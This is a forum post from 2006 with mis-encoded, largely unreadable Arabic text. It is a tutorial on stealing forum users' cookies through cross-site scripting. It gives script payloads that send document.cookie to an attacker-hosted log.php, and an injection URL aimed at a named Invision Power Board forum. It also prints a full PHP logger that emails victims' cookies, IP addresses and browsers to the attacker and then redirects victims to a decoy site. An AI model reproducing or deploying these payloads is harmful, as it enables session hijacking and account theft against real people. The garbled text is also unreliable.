ËÛÑÇÊ ssx - hacking collection

Members Login

Post Info

TOPIC: ËÛÑÇÊ ssx

so9or

ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline

Posts: 632

Date: Thu Dec 28 21:18:44 2006

ËÛÑÇÊ ssx	Permalink

ÇáÓáÇã Úáíßã æÑÍãå Çááå æÈÑßÇÊå ,, ÇáÇä åÐÇ Çæá ÏÑÓ áí ÈåÐÇ ÇáÞÓã æåæ íÊßáã Úä ßíÝíå ÇÓÊÛáÇá ËÛÑÇÊ xss ØíÈ äÃÊí ÇáÇä Çáì ÇáßæÏ Çáãåã Ýí ËÛÑÇÊ xss åÐÇ ßæÏ ÓßÑÈÊ ÎÈíË íÃÊí ÈãÚáæãÇÊ ÇáßæßíÒ ÊÌÏå ÏÇÆãÇ ð Ýí ËÛÑÇÊ xss ßæÏ PHP: <Script>javascript:alert(document.****)</Script> ÇáÃä ÇáßæÏ åÐÇ áã íßæä ÈÇáËÛÑå ÓæÝ íÙåÑ áß ÇáßæßíÒ ÊÈÚß æåæ íÍÊæí Úáì äÞÇØ ãåãå æåí : 1- ÑÞã ÇáÚÖæíå 2- ÇáÈÇÓæÑÏ ãÔÝÑ md5 3 - ÇáÈÇÓæÑÏ ãÔÝÑ Hash æÑÞã ÇáÇÓÊÇíá æÛíÑå ,, Úáì ÍÓÈ äæÚíå ÇáÈÑäÇãÌ ÇáãÕÇÈ! ØíÈ ÇáÍíä æÌÏÊ åÐÇ ÇáßæÏ ÓæÝ äÑÈØå ÈÇááæÌ ãÇåæ ÇááæÌ ¿ ÇááæÌ åÐÇ ÊÑÈØå ãÚ ÇáÓßÑÈÊ ÇáÐí íÇÊí ÈÇáßæßíÒ ,, æÈÚÏ Çä ÊÑÈØå ßá ãä ÝÊÍ ÇáÓßÑÈÊ æåæ ãÑÈæØ ÈÇááæÌ ÓæÝ íÓÌá ãÚáæãÇÊ ÇáßæßíÒ ÊÈÚå ÈÇááæÌ Çæ íÑÓá Çáì Çíãíáß ( Úáì ÍÓÈ ÇááæÌ ) ØíÈ ÇáÇä ÈÚÏ ãÇ ÑÈØÊå ÇÕÈÍ ÇáÑÇÈØ : ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?id="+document.**</Script> ÊãÇã ÇáÇä : www.xxx.com = ÇáãæÞÚ ÇáãÑÈæØ Ýíå ÇááæÌ log.php = ÇÓã ãáÝ ÇááæÌ ØíÈ ÇáÍíä äÑÝÚ ÇááæÌ Úáì Çí ãæÞÚ ÚäÏß æÈÚÏ ßÐÇ ÊÓÊÈÏá www.xxx.com/log.php ÈÑÇÈØ ÇááæÌ Çáí ÚäÏß Çáãåã ÇáÇä åÐÇ ÇáÓßÑÈÊ ÇÕÈÍ ÌÇåÒÇ ááÇÓÊÚãÇá ÓæÝ äÖÚå ÈßæÏ ÇáËÛÑå æäÓÊÈÏá : ßæÏ PHP: <Script>javascript:alert(document.**)</Script> ÈÜ ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?id="+document.**</Script> ÇáÇä äÎáí ãËáÇ ÇáãÏíÑ ÇáÚÇã Çæ Çí ÚÖæ ÊÈí ÊÓÑÞ ÇáßæßíÒ ÊÈÚå Çäå íÝÊÍ ÇáÑÇÈØ ÈÊÞæá ßíÝ ÈÞæáß íÇÇÇæáÏ ÇäÊ æÑÇÇÇÇÇÓß(6) ÚÇÏ ÈØÑíÞÊß Îáíå íÝÊÍ ÇáÑÇÈØ ØíÈ ÇáÍíä ÈÊÞæáí æÇááå ÝÖíÍå íÇÈæ ÎÇáÏ áã ÇÎáíå íÝÊÍ ÇáÑÇÈØ íØáÚ ÚäÏå ÇááæÌ æÈíßÔÝäí ÈÞæáå æáÇ íåãß ÇÎæí äÑÈØå ßãÇä ÈãæÞÚ ááÊãæíå ãËáÇ äÑÈØå ÈãæÞÚ www.google.com ÈÍíË Çäå áã íÝÊÍ ÇáËÛÑå æÇáãÑÈæØ ÝíåÇ ÇááæÌ æãæÞÚ ÌæÌá ÑÇÍ íÊÍæá ÇæÊæãÇÊíß Çáì ÌæÌá æÈßÐÇ ãÇíÔß ÈÊÞæá ßíÝ íÇÈæ ÎÇáÏ ÈÞæáß ßÐÇ äÖÚ ÈÚÏ ÑÇÈØ ÇááæÌ : re=www.google.com& ÈÓ ÈÍíË íßæä ÈÚÏ & íæÌÏ id ... ÇáÎ íÚäí íßæä ÇáßæÏ : ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.**</Script> ØÈÚÇ ÇäÊ ÇÓÊÈÏá www.google.com ÈÇí ãæÞÚ ÊÈÛÇå æíÝÖá íßæä ÇáãæÞÚ Çáí ãÕÇÈ Ýíå ÇáËÛÑå (1) ØíÈ ÇáÍíä ÊÞæá ßÐÇ ÊãÇã íÇÈæ ÎÇáÏ íÇááå ÚØäÇ ãËÇÇÇá ÈÚØíßã ãËÇá áËÛÑå Çáí ÇßÊÔÝÊåÇ ÇäÇ ÈãäÊÏíÇÊ :Invision Power Board ÇáßæÏ ááËÛÑå : http://xxx.com/forums/index.php?act=idx='><script>alert(document.**)</script> ÇÍäÇ ÑÇÍ äÓÊÈÏá : ßæÏ PHP: <Script>javascript:alert(document.**)</Script> ÈÜ ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.**</Script> æÇÓÊÈÏá åäÇ ãæÞÚ ÌæÌá ÈÇí ãæÞÚ ÊÈÛÇå æÑÇÈØ ÇááæÌ www.xxx.com/log.php ÈÇááæÌ ÊÈÚß ==================== ÊØÈíÞ : ÇáÊØÈíÞ åäÇ : ßæÏ PHP: http://www.mahrum.com/forums/index.php?act=idx='><script>alert(document.**)</script> =================== ÇááæÌ : ßæÏ PHP: <?php // Thnx For Security 4 Arab - http://www.s4a.cc - http://www.s4a.com/forum //----- S4a Logger v0.10 -----// // Star //Your Email --::-- $ToGet = "Linux_Drox@hotmail.com"; //////////////////////////////// $Ip = $REMOTE_ADDR; $Sys = $HTTP_USER_AGENT; ////////////////////////////////////////////// if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} // $Time = date("l dS of F Y h:i:s A"); $Hdr = 'From: Logger <logger@secourty>'; $Msg = ' Hi ,, Mr.Attacker :D ------------------------------------------- - Thnx For S4a ,, Security For Arab Forum - - s4a - - s4a froum - --------------------------------------------------------------------- - This Script Coded By Devil-00 [ Devil From Palestine ] - - <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> - --------------------------------------------------------------------- - IP ::- [ ' .$Ip.' ] - System ::- [ '.$Sys.' ] - The ** ::- [ '.$id.' ] - Time ::- [ '.$Time.' ] --------------------------------------------------------------------- - root@devil00 ~ ./evilcat /etc/passwd - - root@devil00 ~ ./s4acracker passwd --log <log.log> && - --------------------------------------------------------------------- '; $send = mail($ToGet,'S4a - [ New**** ]',$Msg,$Hdr); // /* Refresh code ,, By Devil-00 [ 25/5/2005 ] << v0.10 / if(isset($_GET["re"])){ $Refresh = $_GET["re"]; if($Refresh == ""){ mail ($ToGet,'S4a - [Error]','Refresh Is Set And Its Empty !!',$Hdr); }else{ header("location:".$Refresh); } } // ?> ÇÓÊÈÏá åäÇ : ßæÏ PHP: $ToGet = "Linux_Drox@hotmail.com"; ÇáÇíãíá: Linux_Drox@hotmail.com ÈÇáÇíãíá ÊÈÚß ! æÇÍÝÙå ÈÇãÊÏÇÏ php ØÈÚÇ ÇÝÊÍ ÇáãÝßÑå æÍØ ÇáßæÏ æáÇÊäÓì ÊÛíÑ ÇáÇíãíá æÇÍÝÙå ÈÇãÊÏÇÏ php æÇÑÝÚå Úáì ãæÞÚß Çæ Úáì ãæÞÚ áÇíßæÓ æÃÎÕ ÈÇáÔßÑ åäÇ áÃÎí ÇáÚÒíÒ Devil-00 áÈÑãÌÊå åÐÇ ÇááæÌ ÇáÃßËÑ ãä ÑÇÆÚ ÕÑÇÍÉ ================ ãáÇÍÙå : ÇäÇ áã ÇÖÚ ÇáÊØÈíÞ ÇáÇ áÇäå ÏÑÓ Úãáí ÝÞØ áÇ ÃßËÑ .. æÈÅãßÇäß ÇÓÊÛáÇáå ÈËÛÑå xss ÊÈÚ cPanel æÛíÑåÇ ãä ËÛÑÇÊ xss æÍãáæ ßÊÇÈ ÇáÞÑÕÇä Úä ËÛÑÇÊ xss æÝíå ÔÝÑÇÊ ÇáÜ hex ÇáÊí ÊÓÊÎÏã ÏÇÆãÇ Ýí ÇáÓßÑÈÊÇÊ ÇáÎÈíËå æåí ÇáÊí ÊØÈÞ Úä ØÑíÞ ÇáãÊÕÝÍ (( ãåã ÌÏÇ Çäß ÊÚÑÝ ÔÝÑÇÊ Hex )) áÇäåÇ ÞÏ ÊæÕá áÈÑíÏß ÇáãÚáæãÇÊ Úáì ÇáÔßá åÐÇ .. 20% 60% Ýßá ãä æÍÏå áåÇ ãÚäÇ ÓæÝ ÊÍÕáæäå ÈÇáßÊÇÈ ááÞÑÕÇä .. ===================== ÌãíÚ ÇáÍÞæÞ ãÍÝæÙå : Linux_Drox 8/7/2005 ã ===================== æÇáÓáÇã Úáíßã __________________ Linux_Drox ÇáÂä Çááí íÈí íÓÊÝÓÑ Úä Çí ÔíÁ ãä ãæÇÖíÚí Çæ ÔíÁ ãÇÚáíå ÅáÇ íÖíÝäí ÈÓ ÈÏæä ÊÚÇÑÝ QptaN_lEzR@hotmail.com ............................. __________________

Page 1 of 1 sorted by

Add/remove tags to this thread

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse